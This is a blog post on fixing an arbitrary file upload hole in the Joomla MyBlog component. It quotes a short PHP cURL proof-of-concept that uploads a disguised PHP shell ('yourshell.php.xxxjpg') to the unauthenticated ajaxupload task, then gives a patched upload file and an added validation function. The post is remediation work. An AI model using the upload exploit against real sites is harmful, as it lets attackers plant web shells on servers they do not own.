Monday, July 27, 2015

How to fix Joomla com_Myblog Arbitrary File Upload Vulnerability

Today I received a message from my hosting provider informing me that my web site had been hacked.
{HEX}php.nested.base64.534 : /home/user157/domains/mysite.com/public_html/images/blog/csc.php.xxxjpg
I have a Joomla 1.5.26 web site with the my_blog 3.0.332 component. I quickly realised that the problem was caused by 'ajax upload'. I searched on Google and found this:

  <?php
  $uploadfile="yourshell.php.xxxjpg";
  $ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS,
  array('fileToUpload'=>"@$uploadfile"));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  $postResult = curl_exec($ch);
  curl_close($ch);
  print "$postResult";
  ?>

I tried to upload a file and I got:
 'file has been uploaded successfully'

How to fix Joomla com_Myblog Arbitrary File Upload Vulnerability?

Edit this file so that the upload task rejects visitors who are not logged in:

/components/com_myblog/task/ajaxupload.php


 <?php
 /**
  * @package          My Blog
  * @copyright (C) 2008 by Slashes & Dots Sdn Bhd - All rights reserved!
  * @license http://www.azrul.com Copyrighted Commercial Software
  */
 defined('_JEXEC') or die('Restricted access');
 class MyblogAjaxuploadTask
 {
      function display()
      {
           $this->myxAjaxUpload();
      }

      function myxAjaxUpload()
      {
           $my =& JFactory::getUser();  // get the current user
           if ($my->id == "0")  // id 0 means the visitor is not logged in
           {
                # If user not logged in, cannot use upload blog
                echo '<div id="fp-content">';
                echo JText::_('you must LOGIN');
                echo '</div>';
           }
           else  // logged in: the original upload code follows
           {
                global $_MY_CONFIG;
                require_once( MY_LIBRARY_PATH . DS . 'imagebrowser.php' );
                $retVal     = array('error' => '', 'msg' => '' , 'source' => '');
                $resize     = JRequest::getVar( 'resize' , false , 'GET' );
                // Check if there are files uploaded.
                // The error code has to be read from the ['error'] index;
                // comparing the whole $_FILES entry with 0 never matched.
                if( (isset($_FILES['fileToUpload']['error']) && $_FILES['fileToUpload']['error'] == 0)
                || (!empty($_FILES['fileToUpload']['tmp_name']) && $_FILES['fileToUpload']['tmp_name'] != 'none'))
                {
                     $browser     = new MYMediaBrowser();
                     $retVal      = $browser->upload($_FILES['fileToUpload'], $resize);
                }
                else
                {
                     $retVal['error'] = "No file has been uploaded.";
                }
                // Display JSON string to the caller
                echo "{";
                echo "error: '" . $retVal['error'] . "',\n";
                // Test if 'source' index is set
                if( isset($retVal['source']) && !empty($retVal['source']))
                {
                     echo "msg: '" . $retVal['msg'] . "',\n";
                     echo "source: '" . $retVal['source'] . "'\n";
                }
                else
                {
                     echo "msg: '" . $retVal['msg'] . "'\n";
                }
                echo "}";
                exit;
           }
      }

      function execute()
      {
           $this->myxAjaxUpload();
      }
 }
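
The login check limits the task to logged-in users; it does not look at the file itself, and a name like csc.php.xxxjpg can be run as PHP on Apache setups that map the .php extension with AddHandler, because mod_mime considers every extension in the name. The following is an added example, not part of MyBlog or of the original post: a check on the file name and content that could run before `$browser->upload()`. The function name `myblog_check_image_upload` and the list of allowed types are assumptions.

```php
<?php
// Added example, not MyBlog code. The function name is hypothetical.
// Returns '' when the upload may be passed on, otherwise an error message.
// $file is one entry of $_FILES, e.g. $_FILES['fileToUpload'].
function myblog_check_image_upload($file)
{
    // Allowed final extension => image type that the content must have.
    $allowed = array(
        'jpg'  => IMAGETYPE_JPEG,
        'jpeg' => IMAGETYPE_JPEG,
        'png'  => IMAGETYPE_PNG,
        'gif'  => IMAGETYPE_GIF,
    );

    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'Upload failed.';
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'Not an uploaded file.';
    }

    // "csc.php.xxxjpg" splits into csc / php / xxxjpg: three parts, rejected.
    // Names such as "my.photo.jpg" are rejected too; rename before upload.
    $parts = explode('.', strtolower(basename($file['name'])));
    if (count($parts) !== 2 || $parts[0] === '') {
        return 'File name must contain exactly one extension.';
    }
    if (!isset($allowed[$parts[1]])) {
        return 'Only jpg, jpeg, png and gif files are accepted.';
    }

    // The content must decode as the image type the extension claims.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== $allowed[$parts[1]]) {
        return 'File content does not match its extension.';
    }
    return '';
}

// Intended use inside the logged-in branch of myxAjaxUpload():
//   $err = myblog_check_image_upload($_FILES['fileToUpload']);
//   if ($err !== '') { $retVal['error'] = $err; }
//   else { $retVal = $browser->upload($_FILES['fileToUpload'], $resize); }
```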